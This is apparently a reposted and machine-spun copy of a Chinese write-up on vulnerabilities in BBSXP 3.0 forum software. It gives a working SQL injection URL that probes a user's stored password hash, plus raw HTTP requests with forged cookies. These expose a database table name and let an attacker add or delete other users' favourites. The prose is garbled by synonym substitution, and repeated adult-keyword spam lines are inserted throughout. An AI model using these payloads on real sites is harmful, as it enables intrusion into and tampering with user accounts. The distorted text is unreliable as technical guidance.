BBSXP3.0若干问题总结
看各人都喜好注射,毕竟这些工具没什么意思,下午无聊,去看了看BBSXP,最新版本由于历程趁便做了点记录.,以是就献给灰色朋侪了.
PS:鄙视投稿者:) 照旧想做自在人,:}~
PS:此文没什么代价和技术参考,看完就仍掉吧
AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优
BBSXP3.0 beta (2003年10月15日公布)
BBSXP3.0 正式版(2003年10月20日公布)
AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优
宁静性:BBS是网络化产品,宁静性是很严正的问题之一,但我们的专家曾经验证了险些所有可以碰到的宁静毛病,并且真的有新的不为人知的其他毛病呈现,你只需要提供现场给我们的技术职员,我们可以马上为你办理,并且一样平常你只要本身设置一下,不消升级我们的步伐,你就可以永远清除这种毛病. -----------摘自BBSXP说明文
档某条
问题一:
文件favorite.asp
例子:
http://bbs.yuzi.ne/favorites.asp?me...id=7%20and%201=(select%20count(*)%20from%20user%20whe
re%20u
sername='yuzi'%20and%20userpass='96E79218965XXXX2A549DD5A330112')
同时发明了另一小问题
AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优**
AV女优AV女优
.
测试一:
POST /bbsxp2004/bbsxp/favorites.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
applicati
on/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Referer:http://www.xxx.com/bbsxp2004/bbsxp/favorites.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: www.xxx.com
Content-Length: 59
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: eremite=0; username=不存在; userpass=; onlinetime=2003%2D10%2D16+16%3A29%3A03;
now=2003%2D10%2
D16+16%3A34%3A30; addmin=0; ASPSESSIONIDCARSDARQ=GHACCJJCPHHMMOKIBKBILFHD
menu=add&name=测试&url=测试&Submit=%CC%ED+%BC%D3
POST了上面的代码,前往错误,看
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 16 Oct 2003 08:50:07 GMT
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 16 Oct 2003 08:50:07 GMT
Content-Length: 370
Content-Type: text/html
Set-Cookie: now=2003%2D10%2D16+16%3A50%3A08; path=/
Cache-control: private
Microsoft OLE DB Provider for ODBC Drivers =2>错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 由于
数据表'user' 需要一个相关记录,不能添加或修改记录。
/bbsxp2004/bb
sxp/favorites.asp,行16
呵呵!这不是主动暴出了表名字?得到开导是好象ACCESS也能象MSSQL那样暴工具,没有具体实践了,要领共同
错误信息
等.以上POST的代码其实是一个加一个收藏URL的历程,如果USERNAME写一个数据库不存在的用户就招致上述错
误.
OK,我们换个数据库存在的用户看看
POST /bbsxp2004/bbsxp/favorites.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/
vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Referer:http://www.xxx.com/bbsxp2004/bbsxp/favorites.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: www.xxx.com
Content-Length: 59
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: eremite=0; username=yuzi; userpass=; onlinetime=2003%2D10%2D16+16%3A29%3A03;
now=2003%2D10%2D16+1
6%3A34%3A30; addmin=0; ASPSESSIONIDCARSDARQ=GHACCJJCPHHMMOKIBKBILFHD
menu=add&name=test&url=test&Submit=%CC%ED+%BC%D3
看效果~
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 16 Oct 2003 09:05:19 GMT
HTTP/1.1 200 OK
省略.......
秒钟后体系将主动前往...
添加成功
前往收藏夹
href=usercp.asp>
前往控制面
呵呵!~给yuzi加了一个URL收藏了名字是:test URL是test
我们可以给任何人加收藏URL了:)固然也可以随意删除别人的收藏URL了
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
